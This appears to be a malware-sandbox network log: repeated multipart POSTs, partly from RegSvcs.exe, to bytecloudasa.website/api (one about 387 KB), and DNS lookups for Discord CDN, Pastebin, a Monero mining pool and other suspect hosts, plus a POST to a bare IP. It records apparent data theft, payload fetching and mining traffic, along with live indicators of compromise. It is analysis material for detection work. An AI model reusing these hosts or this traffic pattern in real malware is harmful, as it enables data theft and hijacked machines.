Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ZZH4insLeLaCPsZAqQpoq62CGr33v5GW%2Fxj0SZI1lcf1eJ3uRTuFu0NMC8DKcSVCGQ3PSiGeWMS5CltqlfmI%2FiaPDl2HDlavj69pv9jjE9d4EkGeBzYFoK4avQoKTzQy2g4uLe6%2Bug%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8141afd57fca1c1d-AMS
POST

http://bytecloudasa.website/api

RegSvcs.exe

Remote address:

172.67.212.39:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=jd46zr66VpmVmLbwzIP5ieVPjENaHG.7bQsbEq1v_rQ-1696970478-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Tue, 10 Oct 2023 20:41:55 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=okk9adp0d0j1kgtfs6ju7ji3st; expires=Sat, 03 Feb 2024 14:28:34 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 09 Dec 2023 20:41:55 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=UkAUJy%2F3B%2BLg3114eJ%2BVkvPllKKd8Rs4%2FZmHT0hV0si9Whtx%2FL8hyxZTgwA2gDF85M25UgsBw9VfIhzdsWNGKO%2FoA3GHN%2B81AxqDJLZnmeTImzNDnp%2BICFSZsYSCYkWfWWE4AiZtAw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8141afd6dacd0eab-AMS
POST

http://bytecloudasa.website/api

RegSvcs.exe

Remote address:

172.67.212.39:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=jd46zr66VpmVmLbwzIP5ieVPjENaHG.7bQsbEq1v_rQ-1696970478-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Tue, 10 Oct 2023 20:41:55 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=8pttspjr0fdgf8muq3kgfco7ml; expires=Sat, 03 Feb 2024 14:28:34 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 09 Dec 2023 20:41:55 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=UM2G2OffhG4zZLfSAa%2BZWzeAtNBAEd156ULY%2BfpLHX7PhFIwzbbukH%2FZhA7sx7bgfUSEAUjC%2BdQqghkKt7fourc2Xh7S2fHoI1W56nqd0BFGy12W8ZkmQqGtnRsxAUKVo4QJQOjfnA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8141afd84c1a66ca-AMS
POST

http://bytecloudasa.website/api

RegSvcs.exe

Remote address:

172.67.212.39:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=jd46zr66VpmVmLbwzIP5ieVPjENaHG.7bQsbEq1v_rQ-1696970478-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Tue, 10 Oct 2023 20:41:55 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=7o82ug4nc4vlepd8kdi3dsmdpk; expires=Sat, 03 Feb 2024 14:28:34 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 09 Dec 2023 20:41:55 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=gQiy59s3pdyNKdtOMJ%2FWrKIaYt%2F2Cod3L%2BzHHs7wneJqkIbT6JUSLza3rtUUfw41xgXPA5%2BZWcc%2FNlwMtY9txAszCnUMCcXgxQjqPuccd9pbGZE%2BYlkLjZwQt5zDbCHackFJgOZS0w%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8141afda0a6f6626-AMS
POST

http://bytecloudasa.website/api

Remote address:

172.67.212.39:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=jd46zr66VpmVmLbwzIP5ieVPjENaHG.7bQsbEq1v_rQ-1696970478-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Tue, 10 Oct 2023 20:41:55 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=kqs58i41jrqaes279kiefs4gr3; expires=Sat, 03 Feb 2024 14:28:34 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 09 Dec 2023 20:41:55 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4%2FBC1pxrMrKplJMjtaBD%2BShB5kx0R8ItpV6MBQkz6KqU3IluIsQOrSjNHykp0dXbYDSFFfGrklBvk8ajLvf7mCGz788iNk0AgJGSpWayYn0HSrTkpLqMs8MaHFpiTOD4mBuIAtXADQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8141afdb9f3b0b48-AMS
POST

http://bytecloudasa.website/api

Remote address:

172.67.212.39:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=jd46zr66VpmVmLbwzIP5ieVPjENaHG.7bQsbEq1v_rQ-1696970478-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 17428
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Tue, 10 Oct 2023 20:41:56 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=8g2du0q2omgqbhm4qfdm4jd8qi; expires=Sat, 03 Feb 2024 14:28:35 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 09 Dec 2023 20:41:56 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4fp8wz7mMkBo8MdfjOj20%2FHDwHISaLsqj8ijP%2Bv5tGYBzWkKPeUDV%2FOv%2BD%2Bbz0LERzPO29AuiYF1clpby%2FrXCpAVv%2BCiWRNTH5265AwqqebTIx8RmWs%2BnT9gOcncodLkKR9OxAk7uw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8141afddce855c3a-AMS
POST

http://bytecloudasa.website/api

Remote address:

172.67.212.39:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=jd46zr66VpmVmLbwzIP5ieVPjENaHG.7bQsbEq1v_rQ-1696970478-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Tue, 10 Oct 2023 20:41:59 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=e80b60reqfh08tm8h9gdbladpq; expires=Sat, 03 Feb 2024 14:28:38 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 09 Dec 2023 20:41:59 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=l9EoBTybr8tad4sCF4f10R%2B%2F3DOka05gtMH54DeR5DQWJdy9zsFR8lKEIJdA48a4exLkqKcAjI6vnz54%2FH0SvBA%2BQxJwhhQAwDSG9vtrpWbZr1z7LplPTQC842wKTyz7GM0hkM%2B%2FfQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8141aff14ca60e40-AMS
POST

http://bytecloudasa.website/api

Remote address:

172.67.212.39:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=jd46zr66VpmVmLbwzIP5ieVPjENaHG.7bQsbEq1v_rQ-1696970478-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Tue, 10 Oct 2023 20:41:59 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=u5kd3n452cnd8h7hqmp8l390k1; expires=Sat, 03 Feb 2024 14:28:38 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 09 Dec 2023 20:41:59 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=RmLSFMzKbQ4YN0DafJDU7GRKCK4GIkgeKsXUNKEP%2B1esYNB38OqEd992iEl8CclT0DRLzpPfRPnk99RRvlsfVVxMOggoUM613t9bejcaYrPvlVnRszKavXDMEcHH5RkIcs3nXvnZow%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8141aff4bb41b748-AMS
POST

http://bytecloudasa.website/api

Remote address:

172.67.212.39:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=jd46zr66VpmVmLbwzIP5ieVPjENaHG.7bQsbEq1v_rQ-1696970478-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Tue, 10 Oct 2023 20:42:00 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=nqh323p36kcps60mdtvn29lnqk; expires=Sat, 03 Feb 2024 14:28:39 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 09 Dec 2023 20:42:00 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=oqcsd9BsDQETbFvD5KkKPjjEshTDs70TO1d2QsCFVDjhFnO%2Bbd9Tc1MbQcf3YD2pObpck7pHyC1GKgN9O6MLr5aTcqSchr9ZmyhdKGh7d%2B0ItnPb3ca8liwD3Fpczbhd%2FNGsifHzmg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8141aff61b236573-AMS
POST

http://bytecloudasa.website/api

Remote address:

172.67.212.39:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=jd46zr66VpmVmLbwzIP5ieVPjENaHG.7bQsbEq1v_rQ-1696970478-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Tue, 10 Oct 2023 20:42:02 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=hsttdcrqo40ds2dkr9ks2b6idp; expires=Sat, 03 Feb 2024 14:28:40 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 09 Dec 2023 20:42:01 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=3HGo30AwjtQyHKVljWM4DB7jMNKp5Jg5ozwxcgFCEkBhqlHDOk4LbFnHnko8J%2FE%2FbdQmnfVPaSt%2Fkv93%2FjWGVLPpan%2FPIluNo3l8RDHlSGKhCdlizPRoc0pyK%2BqEdOaUxbFkoFFvzw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8141aff74bbf6690-AMS
DNS

tse1.mm.bing.net

Remote address:

8.8.8.8:53

Request

tse1.mm.bing.net

IN A

Response

tse1.mm.bing.net

IN CNAME

mm-mm.bing.net.trafficmanager.net

mm-mm.bing.net.trafficmanager.net

IN CNAME

dual-a-0001.a-msedge.net

dual-a-0001.a-msedge.net

IN A

204.79.197.200

dual-a-0001.a-msedge.net

IN A

13.107.21.200
POST

http://bytecloudasa.website/api

Remote address:

172.67.212.39:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=jd46zr66VpmVmLbwzIP5ieVPjENaHG.7bQsbEq1v_rQ-1696970478-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Tue, 10 Oct 2023 20:42:03 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=dfufmlhtd32q1f9vgif2uqp96q; expires=Sat, 03 Feb 2024 14:28:42 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 09 Dec 2023 20:42:03 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=GTWeUlcheka5FcSkSRzWKygYXTD2%2FQ2WxDKWatcbCUQ%2FzCoLa7tIsqIXUI9MQxW%2BckK%2FTXOqzyQBK2qkAVkLs7XbmXxn60i903DulJYodrGlq4rhLYn3syB2K5vMqZB8kosliNZpTw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8141b008dea1b900-AMS
POST

http://bytecloudasa.website/api

Remote address:

172.67.212.39:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=jd46zr66VpmVmLbwzIP5ieVPjENaHG.7bQsbEq1v_rQ-1696970478-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Tue, 10 Oct 2023 20:42:09 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=kngna5f020v8q1am0cul8pledi; expires=Sat, 03 Feb 2024 14:28:47 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 09 Dec 2023 20:42:08 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ov%2B5NqOexx6Dla9O8UEXJ6fTwfSormIinezfzQ5cRde58pl1CCnmRRASGSLCbzj3VrDcXF892Ut5egBXnEUnjqmda0YEpsB6ODwxGFryAVSF3bvfZvbNc2ub9b1LGYbT2%2F1NkP4cFw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8141b00cdd8f0b04-AMS
DNS

server5.cdntokiog.studio

Remote address:

8.8.8.8:53

Request

server5.cdntokiog.studio

IN A

Response

server5.cdntokiog.studio

IN A

185.82.216.49
DNS

cdn.discordapp.com

Remote address:

8.8.8.8:53

Request

cdn.discordapp.com

IN A

Response

cdn.discordapp.com

IN A

162.159.130.233

cdn.discordapp.com

IN A

162.159.133.233

cdn.discordapp.com

IN A

162.159.134.233

cdn.discordapp.com

IN A

162.159.135.233

cdn.discordapp.com

IN A

162.159.129.233
DNS

stun2.l.google.com

Remote address:

8.8.8.8:53

Request

stun2.l.google.com

IN A

Response

stun2.l.google.com

IN A

74.125.24.127
DNS

walkinglate.com

Remote address:

8.8.8.8:53

Request

walkinglate.com

IN A

Response

walkinglate.com

IN A

188.114.97.0

walkinglate.com

IN A

188.114.96.0
DNS

0.97.114.188.in-addr.arpa

Remote address:

8.8.8.8:53

Request

0.97.114.188.in-addr.arpa

IN PTR

Response
DNS

49.216.82.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

49.216.82.185.in-addr.arpa

IN PTR

Response

49.216.82.185.in-addr.arpa

IN PTR

davidcom
DNS

233.130.159.162.in-addr.arpa

Remote address:

8.8.8.8:53

Request

233.130.159.162.in-addr.arpa

IN PTR

Response
DNS

127.24.125.74.in-addr.arpa

Remote address:

8.8.8.8:53

Request

127.24.125.74.in-addr.arpa

IN PTR

Response

127.24.125.74.in-addr.arpa

IN PTR

sf-in-f1271e100net
POST

http://bytecloudasa.website/api

Remote address:

172.67.212.39:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=jd46zr66VpmVmLbwzIP5ieVPjENaHG.7bQsbEq1v_rQ-1696970478-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 536
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Tue, 10 Oct 2023 20:42:09 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=jhnrjgcjs2tmvrghps5ads3vqs; expires=Sat, 03 Feb 2024 14:28:48 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 09 Dec 2023 20:42:09 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=EzB1y040UeI5uAHNE8q7aJ%2FTtbVMcSIukbtfuBywGyHrxSMn%2FOWQXzpfBMGWkmtEQXCPfYwHqIhy6cOUsHwDIOQUED7RHDHyAzcFbgvKOmDTiV%2Fo7iRU8JwcLUbfSzidLmIjE%2FR3DQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8141b0320a05b99a-AMS
POST

http://bytecloudasa.website/api

Remote address:

172.67.212.39:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=jd46zr66VpmVmLbwzIP5ieVPjENaHG.7bQsbEq1v_rQ-1696970478-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 387452
Host: bytecloudasa.website

Response

HTTP/1.1 200 OK

Date: Tue, 10 Oct 2023 20:42:11 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=5hm4ajkka22qlcqlma8cif7mai; expires=Sat, 03 Feb 2024 14:28:50 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Sat, 09 Dec 2023 20:42:11 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2F2brnsCKOJTYsE7FzSkoEArp7NGlZDXMlylHABDaIlyfK1GS5UrGpQXDCZlv8hu5wv9t3LSni8U03CZnipzkBL2HUOe2wvZfF2s2nZ0ShRugaMehYB4hE15ycAI3UTxZVhP6tzOE%2BA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8141b0353971b8c6-AMS
DNS

xmr-eu1.nanopool.org

Remote address:

8.8.8.8:53

Request

xmr-eu1.nanopool.org

IN A

Response

xmr-eu1.nanopool.org

IN A

163.172.154.142

xmr-eu1.nanopool.org

IN A

51.68.190.80

xmr-eu1.nanopool.org

IN A

212.47.253.124

xmr-eu1.nanopool.org

IN A

51.15.193.130

xmr-eu1.nanopool.org

IN A

51.15.58.224

xmr-eu1.nanopool.org

IN A

135.125.238.108

xmr-eu1.nanopool.org

IN A

51.255.34.118

xmr-eu1.nanopool.org

IN A

51.68.143.81

xmr-eu1.nanopool.org

IN A

51.15.65.182
DNS

pastebin.com

423C.exe

Remote address:

8.8.8.8:53

Request

pastebin.com

IN A

Response

pastebin.com

IN A

172.67.34.170

pastebin.com

IN A

104.20.68.143

pastebin.com

IN A

104.20.67.143
DNS

124.253.47.212.in-addr.arpa

Remote address:

8.8.8.8:53

Request

124.253.47.212.in-addr.arpa

IN PTR

Response

124.253.47.212.in-addr.arpa

IN CNAME

124.1-24.253.47.212.in-addr.arpa

124.1-24.253.47.212.in-addr.arpa

IN PTR

124-253-47-212 instancesscwcloud
DNS

170.34.67.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

170.34.67.172.in-addr.arpa

IN PTR

Response
DNS

81.143.68.51.in-addr.arpa

Remote address:

8.8.8.8:53

Request

81.143.68.51.in-addr.arpa

IN PTR

Response

81.143.68.51.in-addr.arpa

IN PTR

vps-1277fdb0vpsovhnet
DNS

208.143.182.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

208.143.182.52.in-addr.arpa

IN PTR

Response

77.91.68.29:80

http://77.91.68.29/fks/

http

Explorer.EXE

124.5kB
2.7MB
1929
1966

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

